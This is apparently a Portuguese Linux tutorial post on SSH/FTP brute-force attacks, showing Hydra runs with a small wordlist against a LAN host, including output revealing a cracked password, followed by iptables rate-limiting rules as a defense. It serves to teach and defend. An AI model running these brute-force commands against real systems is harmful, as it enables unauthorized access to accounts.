Enviado em 24/04/2019 - 10:46h
Os ataques com força bruta (bruteforce) estão entre as formas mais antigas de hacking, além de serem simples de se implementar, mesmo com pouco conhecimento técnico. Esse tipo de ataque, consiste em multiplas tentativas de login em servidores, usando uma lista de possíveis usuários e senhas, até que se tenha sucesso na autenticação. Uma das formas de prevenção para esse tipo de ataque, está em proibir usuários que tentarem o acesso mais de X vezes por minuto.https://thehacktoday.com/password-cracking-dictionarys-download-for-free/
https://wiki.skullsecurity.org/Passwords
# apt -y install hydra
$ nano wordlist.txt
password
P@ssw0rd
toor
12345678
$ hydra -l diego -P wordlist.txt 192.168.15.205 ssh
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2019-04-24 10:25:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 4 tasks per 1 server, overall 64 tasks, 4 login tries (l:1/p:4), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.15.205 login: diego password: toor
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-04-24 10:26:09
[22][ssh] host: 192.168.15.205 login: diego password: toor
1 of 1 target successfully completed, 1 valid password found
$ hydra -l root -P wordlist.txt 192.168.15.205 ssh
$ hydra -l diego -P wordlist.txt 192.168.15.205 ftp
# nano /etc/ssh/sshd_config
# /etc/init.d/ssh restart
# iptables -A INPUT -i lo -j ACCEPT
# iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# iptables -A INPUT -p tcp -m multiport --dports 21,22,110,143 -m recent --update --seconds 3600 --name BANNED --rsource -j DROP
# iptables-save > /etc/iptables/rules.v4
# service iptables restart
https://www.drsolutions.com.br
Programa IRPF - Guia de Instalação e Resolução de alguns Problemas
Criando uma Infraestrutura para uma micro Empresa
Criar entrada (menuentry) ISO no Grub
Como gerar qualquer emoji ou símbolo unicode a partir do seu teclado
Instalando o Pi-Hole versão v5.18.4 depois do lançamento da versão v6.0
Instalar o VIM 9.1 no Debian 12
Como saber o range de um IP público?
Muitas dificuldades ao instalar distro Linux em Notebook Sony Vaio PCG-6131L (VPCEA24FM)
problema para barrar sites/downloas via HTTPS. (4)
Não acesso a conta do Banco do Brasil pelo Google Chrome (0)
Como fzr Downgrade em um pacote específico (2)